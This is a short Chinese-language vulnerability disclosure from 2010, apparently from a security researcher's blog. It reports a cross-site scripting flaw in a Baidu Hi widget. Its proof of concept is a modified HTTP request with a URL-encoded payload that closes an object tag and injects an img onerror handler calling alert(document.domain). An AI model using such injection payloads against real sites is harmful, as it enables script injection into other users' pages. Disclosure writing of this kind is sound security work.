hi.baidu widget(11258) xss Bug

Author: hi_heige
Blog: http://hi.baidu.com/hi_heige
Team: http://www.80vul.com
date: 2010年6月25日

一 综述
百度模块分享平台(http://act.hi.baidu.com/widget)是百度于2008年8月发布的,借此平台,用户可以方便地升级扩展空间的功能,用户之间还可以将自己制作的模块与别人共享,
经过测试发现模块"虾米播播音乐盒"即:http://act.hi.baidu.com/widget/info/11258存在xss漏洞,当攻击者应用该模块,可导致在hi.baidu插入恶意的js/html代码。

二 PoC

应用模块:
http://act.hi.baidu.com/widget/info/11258

抓’提交’的http包

替换http包:

spModuleRef=%7B%22id%22%3A%22%22%2C%22type%22%3A%22flashDisplay%22%2C%22width%22%3A%22235%22%2C%22height%22%3A%22346%22%2C%22flashurl%22%3A%22http%253A%252F%252Fwww%252Exiami%252Ecom%252Fwidget%252F%2522%253E%253C%252Fobject%253E%253Cimg%2520src%253D2%2520onerror%253Dalert%2528document%252Edomain%2529%253E%253Cdiv%2520%2522%2520%252FmultiPlayer%252Eswf%22%2C%22flashvars%22%3A%22%22%2C%22tip0%2E1%22%3A%22false%22%7D

重新提交修改后的http包。

三 补丁[fix]

等待官方补丁

发表评论?

0 条评论。

发表评论